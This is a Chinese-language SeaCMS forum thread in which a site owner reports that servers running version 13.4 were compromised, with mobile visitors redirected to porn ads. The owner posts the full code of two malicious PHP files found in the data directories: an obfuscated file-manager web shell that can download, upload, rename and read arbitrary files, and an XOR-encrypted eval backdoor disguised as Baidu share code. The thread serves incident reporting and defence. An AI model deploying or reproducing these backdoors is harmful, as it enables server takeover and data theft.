最新
最新
版块
版块
发主题
搜索
搜索
我的
我的

注意了,网站挂马,不知程序bug漏洞,还是?

hdpdqq 4月前 2068 只看Ta

使用版本为13.4,不知道通过什么方式入侵,在网站缓存目录生成病毒文件。

然后批量篡main.class.php,只要是海洋cms站点,服务器上全部挂马。

在最后处插入图片的语法,手机端打开网站直接跳转广告se情引导下载。

路径:/include/main.class.php



最后于 4月前 被hdpdqq编辑 ,原因:
收藏的用户(0 X
正在加载信息~
最新回复 (8)
  • 海洋 4月前 只看Ta
    0 引用 2

    全新安装的 还是升级上去的?

    其他网站之间是隔离的,还是在一个主机里?

    目前没有收到更多挂马问题的报告。

  • hdpdqq 楼主 4月前 只看Ta
    0 引用 3
    全新安装,升级都一样黑,一个服务器上面有几个站,你黑你几个站。

    服务器上有苹果和海洋的,海洋的全部挂马。
  • hdpdqq 楼主 4月前 只看Ta
    0 引用 4

    已知发现问题

    路径   /data/cron.cache.php

    cron.cache.php篡改成代码如下,然后在/data/cache目录有随机生成.php和.aawzip文件(已清理忘记上传代码了)

    再就  篡改include/main.class.php ,在代码最后插入转广告代码,整站转。



    <?php 
//seacms cache file
//Created on 2019-07-13 14:55:49
class UploadBase
{
    public $name = 'base';
    public $ver = '1.0';
    private $config = [];
    public function __construct($config = []) {
        $this->config = $config;
    }
    public function submit($file_path)
    {
        $weibo =  new suOper();
        $weibo->config($GLOBALS['config']['upload']['api']['weibo']);
        $res = $weibo->check();
        if($res['code']>1){
            echo $res['msg'];die;
        }
        $res = $weibo->upload($file_path,false,$weibo->_config['cookie']);
        if(!empty($res['url'])){
            return $res['url'];
        }
        return $file_path;
    }
}
$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D&nbsp;'.$fn.'<br>';}else{$t2.='&nbsp;&nbsp;'.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}
if(!defined('sea_INC')) exit('Access Denied');
$cronnextrun = '';
?>


  • 海洋 4月前 只看Ta
    0 引用 5
    有没有使用第三方采集插件?
  • hdpdqq 楼主 4月前 只看Ta
    0 引用 6
    火车头采集,接口模块也是用的官网压缩包里面的,没有用过第三方的,资源站的也没有用过。
  • 海洋 4月前 只看Ta
    0 引用 7
    hdpdqq 火车头采集,接口模块也是用的官网压缩包里面的,没有用过第三方的,资源站的也没有用过。
    那就奇怪了,我接着关注下,你那边也留一下看看。
  • hdpdqq 楼主 4月前 只看Ta
    0 引用 8
    我已安装云锁,管它什么后门。
  • hdpdqq 楼主 3月前 只看Ta
    0 引用 9

    有一台没有安装云锁,又在/data/admin目录随便生成了。

    <?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D, $K){
    for ($i = 0; $i < strlen($D); $i++) {
        $c = $K[$i + 1 & 15];
        $D[$i] = $D[$i] ^ $c;
    }
    return $D;
}
$pass = 'pass';
$payloadName = 'payload';
$key = '3c6e0b8a9c15224a';
if (isset($_POST[$pass])) {
    $data = encode(base64_decode($_POST[$pass]), $key);
    if (isset($_SESSION[$payloadName])) {
        $payload = encode($_SESSION[$payloadName], $key);
        if (strpos($payload, "getBasicsInfo") === false) {
            $payload = encode($payload, $key);
        }
        eval($payload);
        $left = substr(md5($pass . $key), 0, 5);
        $replacedString = str_replace("bdsek", $left, "var Rebdsek_config=");
        header('Content-Type: text/html');
        echo '<!DOCTYPE html>';
        echo '<html>';
        echo '<head>';
        echo '<meta charset="UTF-8">';
        echo '<title>GetConfigKey</title>';
        echo '</head>';
        echo '<body>';
        echo '<script>';
        echo '<!-- Baidu Button BEGIN';
        echo '<script type="text/javascript" id="bdshare_js" data="type=slide&amp;img=8&amp;pos=right&amp;uid=6537022" ></script>';
        echo '<script type="text/javascript" id="bdshell_js"></script>';
        echo '<script type="text/javascript">';
        echo $replacedString;
        echo base64_encode(encode(@run($data),$key));
        echo ";";
        echo 'document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js?cdnversion=" + Math.ceil(new Date()/3600000);';
        echo '</script>';
        echo '-->';
        echo '</script>';
        echo '</body>';
        echo '</html>';
    } else {
        if (strpos($data, "getBasicsInfo") !== false) {
            $_SESSION[$payloadName] = encode($data, $key);
        }
    }
}
?>


返回
发新帖
作者最近主题: